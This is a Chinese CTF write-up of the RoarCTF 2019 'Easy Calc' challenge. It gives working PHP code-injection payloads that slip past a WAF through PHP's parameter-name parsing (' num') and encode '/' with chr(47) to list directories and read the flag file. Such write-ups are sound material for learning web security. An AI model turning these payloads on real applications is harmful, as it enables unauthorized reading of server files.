[RoarCTF 2019]Easy Calc

这道题没什么思路直接看了wp,有两种解法:

一,利用PHP的字符串解析特性Bypass:

参考文章:利用PHP的字符串解析特性Bypass
在这里插入图片描述
也就是说,在这道题中PHP解析时'num'=' num'='+num',认为它们是同一个变量。

但是waf只认'num'' num''+num'都不在范围内,这样就能绕过waf了。


所以
payload1:

scandir("/")函数读取目录,/被过滤所以换为chr(47)绕过。

? num=1;var_dump(scandir(chr(47)))

file()函数读取flag。

? num=1;var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述
payload2:

空格换为+。

?+num=1;var_dump(scandir(chr(47)))
?+num=1;var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

补充:这里的chr(47)也可以换为hex2bin(dechex(47))

dechex()函数把十进制数转换为十六进制数。hex2bin()函数把十六进制值的字符串转换为 ASCII字符。


二,http走私绕过WAF:

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值